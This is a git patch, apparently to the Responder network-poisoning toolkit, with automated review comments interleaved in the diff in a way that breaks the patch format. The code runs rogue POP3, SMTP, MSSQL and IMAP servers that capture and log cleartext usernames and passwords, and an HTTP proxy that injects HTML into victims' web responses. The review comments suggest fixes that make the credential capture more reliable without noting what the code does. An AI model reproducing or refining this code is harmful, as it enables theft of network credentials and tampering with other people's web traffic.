From 867bcdde03b92c67c74643f25a06049c5ced8a3c Mon Sep 17 00:00:00 2001
From: jrmdev
Date: Thu, 2 Jul 2015 16:52:06 +1000
Subject: [PATCH] Further improvements and fixes.

---
 servers/HTTP.py | 4 ++--
 servers/HTTP_Proxy.py | 27 +++++++++++++--------------
 servers/IMAP.py | 1 +
 servers/MSSQL.py | 5 +++--
 servers/POP3.py | 7 ++++---
 servers/SMTP.py | 31 ++++++++++++++++++++-----------
 utils.py | 1 +
 7 files changed, 44 insertions(+), 32 deletions(-)

diff --git a/servers/HTTP.py b/servers/HTTP.py
index 172a2e8..9929458 100644
--- a/servers/HTTP.py
+++ b/servers/HTTP.py
@@ -171,7 +171,7 @@ def PacketSequence(data, client):
                 return WPAD_Custom
             else:
-                Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToInject)
+                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                 Buffer.calculate()
                 return str(Buffer)
@@ -192,7 +192,7 @@ def PacketSequence(data, client):
                 return WPAD_Custom
             else:
-                Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToInject)
+                Buffer = IIS_Auth_Granted(Payload=settings.Config.HtmlToInject)
                 Buffer.calculate()
                 return str(Buffer)
diff --git a/servers/HTTP_Proxy.py b/servers/HTTP_Proxy.py
index 56b6488..fd7e949 100644
--- a/servers/HTTP_Proxy.py
+++ b/servers/HTTP_Proxy.py
@@ -58,9 +58,9 @@ def InjectData(data, client, req_uri):
         HasBody = re.findall('(]*>)', Content)
         if HasBody:
-            print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HTMLToInject, 3, 1))
+            print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HtmlToInject, 3, 1))
-            Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HTMLToInject))
+            Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HtmlToInject))
         Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content)))
         if "content-encoding: gzip" in Headers.lower():
@@ -74,7 +74,6 @@ def InjectData(data, client, req_uri):
     return data
 class ProxySock:
-
     def __init__(self, socket, proxy_host, proxy_port) :
         # First, use the socket, without any change
@@ -222,7 +221,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
                 return 0
         return 1
-    def socket_proxy(self):
+    def socket_proxy(self, af, fam):
         Proxy = settings.Config.Upstream_Proxy
         Proxy = Proxy.rstrip('/').replace('http://', '').replace('https://', '')
         Proxy = Proxy.split(':')
@@ -230,13 +229,13 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
         try: Proxy = (Proxy[0], int(Proxy[1]))
         except: Proxy = (Proxy[0], 8080)
-        soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        soc = socket.socket(af, fam)
         return ProxySock(soc, Proxy[0], Proxy[1])
     def do_CONNECT(self):
         if settings.Config.Upstream_Proxy:
-            soc = self.socket_proxy()
+            soc = self.socket_proxy(socket.AF_INET, socket.SOCK_STREAM)
         else:
             soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
@@ -261,7 +260,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
             return
         if settings.Config.Upstream_Proxy:
-            soc = self.socket_proxy()
+            soc = self.socket_proxy(socket.AF_INET, socket.SOCK_STREAM)
         else:
             soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
@@ -306,12 +305,12 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
             for i in ins:
                 if i is soc:
                     out = self.connection
-                    #try:
-                    data = i.recv(4096)
-                    if len(data) > 1:
-                        data = InjectData(data, self.client_address[0], self.path)
-                    #except:
-                    # pass
+                    try:
+                        data = i.recv(4096)
+                        if len(data) > 1:
+                            data = InjectData(data, self.client_address[0], self.path)
+                    except:
+                        pass
                 else:
                     out = soc
                     data = i.recv(4096)
@@ -332,4 +331,4 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
     do_HEAD = do_GET
     do_POST = do_GET
     do_PUT = do_GET
-    do_DELETE=do_GET
\ No newline at end of file
+    do_DELETE=do_GET
diff --git a/servers/IMAP.py b/servers/IMAP.py
index bf67579..8463e86 100644
--- a/servers/IMAP.py
+++ b/servers/IMAP.py
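Review bot: In the `@@ -222` hunk the new signature `def socket_proxy(self, af, fam):` names its second parameter `fam`, but both call sites added in the `@@ -230` and `@@ -261` hunks pass `socket.SOCK_STREAM`, which is a socket type, not an address family, so `socket.socket(af, fam)` reads as if the family were passed twice. Renaming to `def socket_proxy(self, family, socktype):` and `soc = socket.socket(family, socktype)` keeps the call sites unchanged and makes the intent clear. Giving the parameters defaults (`family=socket.AF_INET, socktype=socket.SOCK_STREAM`) would also keep any caller outside this diff that still invokes `socket_proxy()` with no arguments working; I cannot see whether such a caller exists. A one-line docstring stating that the returned `ProxySock` tunnels through `settings.Config.Upstream_Proxy` would document the method, which currently has none.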
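Review bot: In the `@@ -306` hunk the re-enabled `try:` around `i.recv(4096)` and `InjectData(...)` ends in a bare `except: pass`, which also swallows `KeyboardInterrupt`/`SystemExit` and hides any exception raised inside `InjectData`, and when `recv` itself raises, `data` keeps the value it held from the previous loop iteration (or is unbound on the first), so whatever the loop does with `data` after this hunk — which lies outside it — may forward stale bytes. Suggest `except Exception as e:` with a log line, and either `data = ''` or a `break` in the handler so the relay stops instead of silently continuing. Since this guard was previously commented out, a comment on the `try` naming the failure it is meant to absorb would help the next reader; the enclosing method starts and ends outside the hunk.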
@@ -17,6 +17,7 @@ import os
 import settings
+from utils import *
 from SocketServer import BaseRequestHandler
 from packets import IMAPGreeting, IMAPCapability, IMAPCapabilityEnd
diff --git a/servers/MSSQL.py b/servers/MSSQL.py
index 0aca262..66e4bbd 100644
--- a/servers/MSSQL.py
+++ b/servers/MSSQL.py
@@ -112,17 +112,18 @@ def ParseClearTextSQLPass(data, client):
 class MSSQL(BaseRequestHandler):
     def handle(self):
+        print text("[MSSQL] Received connection from %s" % self.client_address[0])
         try:
             while True:
                 data = self.request.recv(1024)
                 self.request.settimeout(0.1)
-
+
                 # Pre-Login Message
                 if data[0] == "\x12":
                     Buffer = str(MSSQLPreLoginAnswer())
                     self.request.send(Buffer)
                     data = self.request.recv(1024)
-
+
                 # NegoSSP
                 if data[0] == "\x10":
                     if re.search("NTLMSSP",data):
diff --git a/servers/POP3.py b/servers/POP3.py
index 7944b94..f96be7c 100644
--- a/servers/POP3.py
+++ b/servers/POP3.py
@@ -17,6 +17,7 @@ import os
 import settings
+from utils import *
 from SocketServer import BaseRequestHandler
 from packets import POPOKPacket
@@ -41,9 +42,9 @@ class POP3(BaseRequestHandler):
                 if data[0:4] == "PASS":
                     Pass = data[5:].replace("\r\n","")
-                    print text("[POP3] Address : %s" % self.client_address[0])
-                    print text("[POP3] Username : %s" % User)
-                    print text("[POP3] Password : %s" % Pass)
+                    print text("[POP3] Address : %s" % color(self.client_address[0], 3))
+                    print text("[POP3] Username : %s" % color(User, 3))
+                    print text("[POP3] Password : %s" % color(Pass, 3))
                     WriteData(settings.Config.POP3Log % self.client_address[0], User+":"+Pass, User+":"+Pass)
                     data = self.SendPacketAndRead()
diff --git a/servers/SMTP.py b/servers/SMTP.py
index bfa0ca7..186dae9 100644
--- a/servers/SMTP.py
+++ b/servers/SMTP.py
@@ -17,6 +17,8 @@ import os
 import settings
+from utils import *
+from base64 import b64decode, b64encode
 from SocketServer import BaseRequestHandler
 from packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
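Review bot: `from utils import *` is added here in IMAP.py and again in the POP3.py and SMTP.py import hunks below; the wildcard hides which names each module actually takes from `utils` (`text`, `color` and `WriteData` are the ones visible in the hunks) and can silently shadow other module-level names. Prefer an explicit `from utils import text, color, WriteData`, adjusted to what each module really uses — I cannot see the rest of these files — so the dependency is visible and a linter can flag unused or missing names.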
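Review bot: The new `print text("[MSSQL] Received connection from %s" % self.client_address[0])` in the MSSQL.py hunk does not colour the address, while the POP3 and SMTP hunks in the same commit switch to `color(self.client_address[0], 3)`; for consistency use `print text("[MSSQL] Received connection from %s" % color(self.client_address[0], 3))`. That relies on `color` being importable in MSSQL.py, which this hunk does not show.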
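Review bot: The SMTP.py import hunk adds `from base64 import b64decode, b64encode`, but only `b64decode` is used in the AUTH hunk that follows; if `b64encode` is not used elsewhere in the file (which I cannot see), import just `from base64 import b64decode` so the unused name does not linger.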
@@ -35,21 +37,28 @@ class ESMTP(BaseRequestHandler):
                 if data[0:4] == "AUTH":
                     self.request.send(str(SMTPAUTH1()))
                     data = self.request.recv(1024)
-
+
                     if data:
-                        Username = b64decode(data[:len(data)-2])
-                        self.request.send(str(SMTPAUTH2()))
-                        data = self.request.recv(1024)
+                        try:
+                            User = filter(None, b64decode(data).split('\x00'))
+                            Username = User[0]
+                            Password = User[1]
+                        except:
+                            Username = b64decode(data)
-                        if data:
-                            Password = b64decode(data[:len(data)-2])
+                        self.request.send(str(SMTPAUTH2()))
+                        data = self.request.recv(1024)
-                            print text("[SMTP] Address : %s" % color(self.client_address[0], 3, 0))
-                            print text("[SMTP] Username : %s" % color(Username, 3, 0))
-                            print text("[SMTP] Password : %s" % color(Password, 3, 0))
-                            WriteData(settings.Config.SMTPClearLog % self.client_address[0], Username+":"+Password, Username+":"+Password)
+                        if data:
+                            try: Password = b64decode(data)
+                            except: Password = data
-                ## FIXME: Close connection properly
+                        print text("[SMTP] Address : %s" % color(self.client_address[0], 3))
+                        print text("[SMTP] Username : %s" % color(Username, 3))
+                        print text("[SMTP] Password : %s" % color(Password, 3))
+                        WriteData(settings.Config.SMTPClearLog % self.client_address[0], Username+":"+Password, Username+":"+Password)
+
+                ## FIXME: Close connection properly
         except Exception:
             pass
\ No newline at end of file
diff --git a/utils.py b/utils.py
index a28e751..2c86743 100644
--- a/utils.py
+++ b/utils.py
@@ -211,6 +211,7 @@ def StartupMessage():
     print ""
     print ""
+# Useful for debugging
 def hexdump(src, l=0x16):
     res = []
     sep = '.'
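Review bot: `Password` can be unbound when the new `print text("[SMTP] Password : %s" % color(Password, 3))` and the `WriteData(...)` line run: if the first `try` falls into its bare `except:` only `Username` is assigned, and if the following `self.request.recv(1024)` returns empty the second `if data:` is skipped, so the print raises `NameError`, which the surrounding `except Exception: pass` (context at the end of the hunk) swallows without a trace. Both new `except:` clauses are bare, and the first one re-calls `b64decode(data)`, which simply raises again when the decode was what failed (Python 2's `b64decode` raises `TypeError` on bad padding). Suggest `except (IndexError, TypeError):` on the first and `except TypeError:` on the second, binding `Password` before the `try`, and logging in the outer handler rather than `pass`. The `## FIXME: Close connection properly` line is moved but still unaddressed; the enclosing `handle` method starts and ends outside this hunk.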